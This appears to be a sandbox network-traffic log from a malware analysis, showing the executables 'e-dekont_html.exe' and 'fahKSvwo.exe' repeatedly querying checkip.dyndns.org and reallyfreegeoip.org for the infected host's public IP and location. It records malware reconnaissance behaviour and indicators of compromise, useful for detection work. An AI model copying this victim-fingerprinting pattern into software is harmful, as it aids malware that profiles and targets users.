Nov 20, 2024 07:52:15.524806023 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:16.666760921 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:16 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 8d9a8402a6199b15b29d325b3f5ac96e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 193.122.130.0 | 80 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:16.604588032 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:17.142674923 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:17 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b27c5b87a98960cba6309f9b9b94b0c6
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 07:52:17.151498079 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:18.188131094 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: d88087268bb27347e8ad913dcf9db885
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                        Nov 20, 2024 07:52:19.308557987 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:19.414479971 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:19 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 029c26e48c17c4d3cab72497771901b1
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp: Nov 20, 2024 07:52:17.297436953 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:18.846545935 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:18 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ae9e7c5fc37e2652a9b92663b1531d71
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp: Nov 20, 2024 07:52:19.524987936 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:20.009561062 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:19 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c26ae82502013e7043f6b9418388a762
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7696 | Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp: Nov 20, 2024 07:52:20.086951971 CET | Bytes transferred: 127 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Timestamp: Nov 20, 2024 07:52:20.587681055 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:20 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 59e9ba3cb43a81716b2a2faebe01f3d4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp: Nov 20, 2024 07:52:20.632050991 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:21.240581036 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:21 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5b9392353e21a2a18a3667e365a92d3a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7696 | Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp: Nov 20, 2024 07:52:21.305669069 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:23.158598900 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:23 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a080142ff8129e68f9b6b9e126610ac4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp: Nov 20, 2024 07:52:21.899164915 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:23.388186932 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:23 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b46e480a74b1b041448389b7d4d2ac58
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7696 | Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp: Nov 20, 2024 07:52:23.788970947 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Nov 20, 2024 07:52:25.552380085 CET | Bytes transferred: 320 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:25 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: caa41d2b43be7afe747952be38a03c53
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49763 | 193.122.130.0 | 80 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:24.076741934 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:25.731915951 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:25 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: aecde076e1429a07a64731cf10ffba08
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 61281 | 193.122.130.0 | 80 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:26.159900904 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:26.906852961 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:26 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 65e05123837ba879d3590c2a43281ca2
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 61284 | 193.122.130.0 | 80 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:27.593836069 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:29.172739983 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:29 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b1d0f39ff52a0bd337d1aea90ffec250
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 61286 | 193.122.130.0 | 80 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:29.786780119 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:30.439938068 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:30 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d96bf50d41e186d8e9db5e98bc1fc7fc
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 61288 | 193.122.130.0 | 80 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:31.087949038 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:31.563946009 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:31 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: deaa5078d9e27a539eb1f5b1702f078f
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:13 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-20 06:52:13 UTC | 854 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:13 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49442
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uj6ghEzOXkb4tUDRtcAW%2F1S0fUVbxt0Vu9iOn0nkqJLFW8OyIRORvMxJPMHSnkQiWM2uTs%2FTOoTPSKGAMu4N8xDbPNqmgPayNDK73Mk7Xx6Eu91QPi%2Fg%2BTihzK19R%2BcSAYiXBUYU"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e568417acecc40c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1720683&cwnd=219&unsent_bytes=0&cid=43b3db02c82498e3&ts=268&x=0"
2024-11-20 06:52:13 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:14 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-20 06:52:14 UTC | 854 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:14 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49443
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRftJ3pLn27RJLLFPhSD7vy9bOpc7PyKla%2Ffs13OfcE2eGmzaAJ7pqDXVxEuur4Yi8XbFX2tUxzb9TDofWg%2Fo%2FUYh0DasM71vsLh%2ByKAzG2jFUgVUxmswfTV%2F4p9JR9NJRWPY7d7"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56841c9a404345-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1796923&cwnd=211&unsent_bytes=0&cid=509bf9aa2181e81c&ts=136&x=0"
2024-11-20 06:52:14 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:15 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-20 06:52:15 UTC | 844 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:15 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49444
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdpePzeRsR0T6myfP5mgrpeWvVjQVHZngqpAkQA7NIK5lDdKjfnB1mTVT9divdqjZfOHZbPkBhPovi6A15innHOYUZtadBnuds8TzotwRxztQWKRMspQwHCT1Nsbzpat3Co3EycG"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5684249dba8c57-EWR
    alt-svc: h3=":443"; ma=86400
